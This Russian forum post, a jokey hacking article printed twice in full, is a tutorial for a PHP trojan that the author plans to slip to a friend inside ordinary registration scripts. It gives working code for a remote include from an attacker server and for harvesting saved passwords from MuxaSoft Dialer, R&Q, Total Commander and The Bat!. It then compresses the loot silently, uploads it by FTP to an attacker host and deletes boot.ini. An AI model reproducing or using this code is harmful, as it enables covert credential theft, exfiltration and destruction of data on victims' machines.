k1b0rg
02.09.2006, 16:17
Я начну эту статью, также как и начинаються все безперспективные статьи.
Однажды дома, пив с другом пиво и лапав баб, мы с ним поспорили что комп друга никак нельзя взломать. (ХЗ, но всегда почему-то после бычки тянет на взлом, гы лол). Так как компьютер моему корешу купили неделю назад, он уже спокойно мне объяснял разницу между RFC 2616 и RFC-822? рассказывал про технологию web 2.0. Упс, забыл перелистнуть страницу своего дневника. Итак. Под предлогом того, что пиво имеет свойство не останавливаться в теле человека, я подполз к компу своего другана. Первый осмотр показал что комп можно взломать. т.к. системная крышка не была прикручена. Ладно, осматриваем дальше. О-пля, я нахожу мышь, клаву, монитор и системный блок. Осматриваю экран монитора, кроме Windows на рабочем столе вижу еще парочку интересных на мой взгляд программ. Блокнот, Сапер, Косынка, Counter-strike, StripGirl, Quake и т.д... Ну вообщем типичный набор сисадмина.
Перевожу взгляд вниз и направо. Вижу : Nod32, Outpost firewall 4, KAV Antihacker. Точно чувак что-то админит, отметил киборг, и побежал допивать свое пиво. Итак поспорив (это все пиво гадина) с другом что я его взломаю на 20 литров пива, стащив у него остатки пива я отправился домой. Допил пиво, разделся, лег в кровать, почуствовал что рядом лежит какая то девушка, спихнул её , оделся, заснул. Проснувшись утром на полу, потому что деваха все таки поднялась и спихнула меня, я начал думать(подумали про взлом? нихрена, я подумал про похмелье.) Ладно опустим прелюдию. Сев за комп, стал думать как же взломать этого кекса ,т.к. 20 литров пива у компьютерщиков быть не может. Пришла совершенно тупая идея полазить в поисковике. Среди результатов поиска нашол сцылку на его профиль на phpclub.ru. Мда, интересно, что там делает это чудак. Оказалось, что он там спрашивал какие-то скрипты регистрации. (причом тема была совсем свежая). И тут, меня словно током бьет(розетка задымилась). А ведь можно написать php троян и подсунуть этому чуваку вместе со его скриптами. Как я себе это представлял:
1) Троян находиться на серваке, а в скриптах просто напросто инклудиться @include "http://lol.ru/troi.txt";
Можно конечно и поэксперементировать с шифрованием, но это все замашки бюрократов. Мне это не нужно было.
2) Троян собирает пароли и отсылает мне их на мыло или на фтп.
Потом я решил, что лучше пусть собирает файлы с паролями а декодировать ну его нах, лишний вес и т.д.
3) Быть незаметным и не палиться, и не грузить систему.
4) Удалить boot.ini и вывести в окно надпись "Hacked by k1b0rg";
Итак, сначала я должен был знать, с какими программами мне придеться работать.
1) MuxaSoftDialer я когда то ему ее довал.
2) R&Q - узнал в своем icq клиенте.
3) Total Commander - узнал просто спросив, чем он заливает файлы на сервак.
4) The Bat! Узнал из заголовка его письма присланного мне.(он не любит web интерфейс).
Итак поочередно и будем рассматривать каждую программу.
MuxaSoftDialer.
Пароли храняться в файле C:\Program Files\MuxaSoft Dialer\Profiles\(имя пользователя).mdp
Тут немного подумав я решил подставить текущего юзера.
Узнав его через $_ENV['USERNAME'];
function muxa()
{
$log=@fopen('temp.log','a');
$file=@file('C:\Program Files\MuxaSoft Dialer\Profiles/'.$_ENV['USERNAME'].'.mdp','r');
fputs($log,"\n\n------------------------------------MuxaSoftDialer--------------------------------------------------");
fputs($log,"\n".$file[47].$file[48].$file[49]);
fputs($log,"\n------------------------------------MuxaSoftDialer--------------------------------------------------");
fclose($log);
}
R&Q версии 1030.
По дефолту он устанавливаеться в путь C:\Program Files\R&Q
Пароли храняться в файлах C:\Program Files\R&Q\(номер icq)\andrq.ini
Итак сначала мы просканим C:\Program Files\R&Q на наличие циферных папок (номерков асек чела ,вдруг у него не один номер?).
А потом у каждого номера вытащим пассы.
function andrq()
{
//$log=fopen('C:\WINDOWS\Temp\temp.log','a');
$log=@fopen('temp.log','a');
fputs($log,"\n------------------------------------------R&Q-------------------------------------------------------");
$dir=@opendir('C:\Program Files\R&Q/');
while ($file = @readdir($dir)){
if(@is_dir('C:\Program Files\R&Q/'.$file) && (@is_numeric(basename('C:\Program Files\R&Q/'.$file))))
$di[]=$file;
}
@closedir($dir);
unset($file);
foreach ($di as $key=>$val)
{
$file=@file('C:\Program Files\R&Q/'.$val.'/andrq.ini');
fputs($log,"\nNumber: ".$val."Login: ".$file[0]."Pass: ".$file[2]);
}
fputs($log,"------------------------------------------R&Q-------------------------------------------------------");
}
Total Commander.
По дефолту файл с паролями находиться в C:\WINDOWS\wcx_ftp.ini
Лично я это файл не парсил а прям так пихнул.
function total()
{
$log=@fopen('temp.log','a');
fputs($log,"\n\n------------------------------------Total Commander--------------------------------------------------\n");
$file=fopen('C:\WINDOWS\wcx_ftp.ini','r');
while(!feof($file))
fputs($log,fgets($file));
fputs($log,"------------------------------------Total Commander--------------------------------------------------");
fclose($log);
fclose($file);
}
Но можете и пропарсить его функцией parse_ini_file()
$ini_array = parse_ini_file("C:\WINDOWS\wcx_ftp.ini", true);
print_r($ini_array);
The Bat!
Он хранит свои пароли
C:\Documents and Settings\(юзер)\Application Data\The Bat!\(почта)\Account.CFN
function ebat()
{
$dir=@opendir('C:\Documents and Settings/'.$_ENV['USERNAME'].'\Application Data\The Bat!/');
while ($file = @readdir($dir)){
if($file!="." && $file!=".." && preg_match("/^[-0-9A-Z_\.]{1,50}@([-0-9A-Z_\.]+\.){1,50}([0-9A-Z]){2,4}$/i",$file))
$di[]=$file;
}
foreach ($di as $key=>$val)
@copy('C:\Documents and Settings/'.$_ENV['USERNAME'].'\Application Data\The Bat!/'.$val.'\Account.CFN','troi'.$val.'.Account.CFN');
}
В php нету функцией для работы с реестром, а но и нах не надо, у нас же есть функция system();
function reestr($query)
{
@ob_start();
system('reg query '.$query);
$cmd.=ob_get_contents();
ob_end_clean();
$cmd=str_replace("\t","",$cmd);
preg_match("/REG_SZ(.+)/i",$cmd,$ret);
$cmd=$ret[1];
return $cmd;
}
$put=reestr('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Uninstall\Totalcmd /v UninstallString');
$put=str_replace("tcuninst.exe","",$put);
echo $put;
покажет путь где расположен тотал командер.
вот терь у нас есть функция для работы с реестром.
Такс, терь у нас появились файлы, надо бы их соединить в один и сжать, как быть? можно написать целый класс сжатия на php но имхо это беспонтово, долго, и много кода. Возьмем то что почти у всех стоит. Winrar.
Консольная команда сжатия: winrar.exe a log troi* -ibck -df
a добавляет архив
log имя архива плюс *.rar
troi* все файлы которые начинаються на troi
-ibck запустить в фоновом режиме, чтобы не появлялось окно статуса сжатия файла.
-df удалить файлы после архивации
итак команда для архивировании наших файлов будет
@system('C:\Program Files\WinRAR>WinRAR.exe a путь до файла troi.* -ibck -df');
[quote]
для лучшего палева кидайте прям в ту папку в которой находитесь
[quote]
$dir=getcwd();
@system('C:/"Program Files"/WinRAR/WinRAR.exe a '.$dir.'/troi '.$dir.'/troi.* -ibck -df');
Все теперь мы все собрали в один файл. Теперь этот файл надо как-нить переслать нам.
Это можно сделать по-крайне мере 3 путями.
1) отослать по мылу - если денвер то заглушка стоит.
2) загрузить на фтп
3) через web страницу - Простое сохранение например post запроса в файл.
Нуиво нах еще чото писать, устал я.
Я рассматрю тока фтп. Т.к. все остальное неоднократно разжавывалось в инете. Да и работа с фтп везде описана.
$host='kiborg.lol.ru';
$login='admin';
$pass='admin';
list($ftp_server,$ftp_port) = split(":",$host);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
@ftp_login($connection,$login,$pass);
if(@ftp_put($connection,'путь на фтп серваке, куда нужно сохранить файл','путь до файла который нкжно отправить',FTP_BINARY))
echo 'Файл загружен';
else
echo 'Файл не загружен!';
@ftp_close($connection);
Оце так цяця! Общее время работы скрипта с отсылкой файла 2 секунды.
@unlink('C:\boot.ini');
p.s. Статья писалась на несвежую голову, в психушке, с диагнозом марамза у автора.
Однажды дома, пив с другом пиво и лапав баб, мы с ним поспорили что комп друга никак нельзя взломать. (ХЗ, но всегда почему-то после бычки тянет на взлом, гы лол). Так как компьютер моему корешу купили неделю назад, он уже спокойно мне объяснял разницу между RFC 2616 и RFC-822? рассказывал про технологию web 2.0. Упс, забыл перелистнуть страницу своего дневника. Итак. Под предлогом того, что пиво имеет свойство не останавливаться в теле человека, я подполз к компу своего другана. Первый осмотр показал что комп можно взломать. т.к. системная крышка не была прикручена. Ладно, осматриваем дальше. О-пля, я нахожу мышь, клаву, монитор и системный блок. Осматриваю экран монитора, кроме Windows на рабочем столе вижу еще парочку интересных на мой взгляд программ. Блокнот, Сапер, Косынка, Counter-strike, StripGirl, Quake и т.д... Ну вообщем типичный набор сисадмина.
Перевожу взгляд вниз и направо. Вижу : Nod32, Outpost firewall 4, KAV Antihacker. Точно чувак что-то админит, отметил киборг, и побежал допивать свое пиво. Итак поспорив (это все пиво гадина) с другом что я его взломаю на 20 литров пива, стащив у него остатки пива я отправился домой. Допил пиво, разделся, лег в кровать, почуствовал что рядом лежит какая то девушка, спихнул её , оделся, заснул. Проснувшись утром на полу, потому что деваха все таки поднялась и спихнула меня, я начал думать(подумали про взлом? нихрена, я подумал про похмелье.) Ладно опустим прелюдию. Сев за комп, стал думать как же взломать этого кекса ,т.к. 20 литров пива у компьютерщиков быть не может. Пришла совершенно тупая идея полазить в поисковике. Среди результатов поиска нашол сцылку на его профиль на phpclub.ru. Мда, интересно, что там делает это чудак. Оказалось, что он там спрашивал какие-то скрипты регистрации. (причом тема была совсем свежая). И тут, меня словно током бьет(розетка задымилась). А ведь можно написать php троян и подсунуть этому чуваку вместе со его скриптами. Как я себе это представлял:
1) Троян находиться на серваке, а в скриптах просто напросто инклудиться @include "http://lol.ru/troi.txt";
Можно конечно и поэксперементировать с шифрованием, но это все замашки бюрократов. Мне это не нужно было.
2) Троян собирает пароли и отсылает мне их на мыло или на фтп.
Потом я решил, что лучше пусть собирает файлы с паролями а декодировать ну его нах, лишний вес и т.д.
3) Быть незаметным и не палиться, и не грузить систему.
4) Удалить boot.ini и вывести в окно надпись "Hacked by k1b0rg";
Итак, сначала я должен был знать, с какими программами мне придеться работать.
1) MuxaSoftDialer я когда то ему ее довал.
2) R&Q - узнал в своем icq клиенте.
3) Total Commander - узнал просто спросив, чем он заливает файлы на сервак.
4) The Bat! Узнал из заголовка его письма присланного мне.(он не любит web интерфейс).
Итак поочередно и будем рассматривать каждую программу.
MuxaSoftDialer.
Пароли храняться в файле C:\Program Files\MuxaSoft Dialer\Profiles\(имя пользователя).mdp
Тут немного подумав я решил подставить текущего юзера.
Узнав его через $_ENV['USERNAME'];
function muxa()
{
$log=@fopen('temp.log','a');
$file=@file('C:\Program Files\MuxaSoft Dialer\Profiles/'.$_ENV['USERNAME'].'.mdp','r');
fputs($log,"\n\n------------------------------------MuxaSoftDialer--------------------------------------------------");
fputs($log,"\n".$file[47].$file[48].$file[49]);
fputs($log,"\n------------------------------------MuxaSoftDialer--------------------------------------------------");
fclose($log);
}
R&Q версии 1030.
По дефолту он устанавливаеться в путь C:\Program Files\R&Q
Пароли храняться в файлах C:\Program Files\R&Q\(номер icq)\andrq.ini
Итак сначала мы просканим C:\Program Files\R&Q на наличие циферных папок (номерков асек чела ,вдруг у него не один номер?).
А потом у каждого номера вытащим пассы.
function andrq()
{
//$log=fopen('C:\WINDOWS\Temp\temp.log','a');
$log=@fopen('temp.log','a');
fputs($log,"\n------------------------------------------R&Q-------------------------------------------------------");
$dir=@opendir('C:\Program Files\R&Q/');
while ($file = @readdir($dir)){
if(@is_dir('C:\Program Files\R&Q/'.$file) && (@is_numeric(basename('C:\Program Files\R&Q/'.$file))))
$di[]=$file;
}
@closedir($dir);
unset($file);
foreach ($di as $key=>$val)
{
$file=@file('C:\Program Files\R&Q/'.$val.'/andrq.ini');
fputs($log,"\nNumber: ".$val."Login: ".$file[0]."Pass: ".$file[2]);
}
fputs($log,"------------------------------------------R&Q-------------------------------------------------------");
}
Total Commander.
По дефолту файл с паролями находиться в C:\WINDOWS\wcx_ftp.ini
Лично я это файл не парсил а прям так пихнул.
function total()
{
$log=@fopen('temp.log','a');
fputs($log,"\n\n------------------------------------Total Commander--------------------------------------------------\n");
$file=fopen('C:\WINDOWS\wcx_ftp.ini','r');
while(!feof($file))
fputs($log,fgets($file));
fputs($log,"------------------------------------Total Commander--------------------------------------------------");
fclose($log);
fclose($file);
}
Но можете и пропарсить его функцией parse_ini_file()
$ini_array = parse_ini_file("C:\WINDOWS\wcx_ftp.ini", true);
print_r($ini_array);
The Bat!
Он хранит свои пароли
C:\Documents and Settings\(юзер)\Application Data\The Bat!\(почта)\Account.CFN
function ebat()
{
$dir=@opendir('C:\Documents and Settings/'.$_ENV['USERNAME'].'\Application Data\The Bat!/');
while ($file = @readdir($dir)){
if($file!="." && $file!=".." && preg_match("/^[-0-9A-Z_\.]{1,50}@([-0-9A-Z_\.]+\.){1,50}([0-9A-Z]){2,4}$/i",$file))
$di[]=$file;
}
foreach ($di as $key=>$val)
@copy('C:\Documents and Settings/'.$_ENV['USERNAME'].'\Application Data\The Bat!/'.$val.'\Account.CFN','troi'.$val.'.Account.CFN');
}
В php нету функцией для работы с реестром, а но и нах не надо, у нас же есть функция system();
function reestr($query)
{
@ob_start();
system('reg query '.$query);
$cmd.=ob_get_contents();
ob_end_clean();
$cmd=str_replace("\t","",$cmd);
preg_match("/REG_SZ(.+)/i",$cmd,$ret);
$cmd=$ret[1];
return $cmd;
}
$put=reestr('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Uninstall\Totalcmd /v UninstallString');
$put=str_replace("tcuninst.exe","",$put);
echo $put;
покажет путь где расположен тотал командер.
вот терь у нас есть функция для работы с реестром.
Такс, терь у нас появились файлы, надо бы их соединить в один и сжать, как быть? можно написать целый класс сжатия на php но имхо это беспонтово, долго, и много кода. Возьмем то что почти у всех стоит. Winrar.
Консольная команда сжатия: winrar.exe a log troi* -ibck -df
a добавляет архив
log имя архива плюс *.rar
troi* все файлы которые начинаються на troi
-ibck запустить в фоновом режиме, чтобы не появлялось окно статуса сжатия файла.
-df удалить файлы после архивации
итак команда для архивировании наших файлов будет
@system('C:\Program Files\WinRAR>WinRAR.exe a путь до файла troi.* -ibck -df');
[quote]
для лучшего палева кидайте прям в ту папку в которой находитесь
[quote]
$dir=getcwd();
@system('C:/"Program Files"/WinRAR/WinRAR.exe a '.$dir.'/troi '.$dir.'/troi.* -ibck -df');
Все теперь мы все собрали в один файл. Теперь этот файл надо как-нить переслать нам.
Это можно сделать по-крайне мере 3 путями.
1) отослать по мылу - если денвер то заглушка стоит.
2) загрузить на фтп
3) через web страницу - Простое сохранение например post запроса в файл.
Нуиво нах еще чото писать, устал я.
Я рассматрю тока фтп. Т.к. все остальное неоднократно разжавывалось в инете. Да и работа с фтп везде описана.
$host='kiborg.lol.ru';
$login='admin';
$pass='admin';
list($ftp_server,$ftp_port) = split(":",$host);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
@ftp_login($connection,$login,$pass);
if(@ftp_put($connection,'путь на фтп серваке, куда нужно сохранить файл','путь до файла который нкжно отправить',FTP_BINARY))
echo 'Файл загружен';
else
echo 'Файл не загружен!';
@ftp_close($connection);
Оце так цяця! Общее время работы скрипта с отсылкой файла 2 секунды.
@unlink('C:\boot.ini');
p.s. Статья писалась на несвежую голову, в психушке, с диагнозом марамза у автора.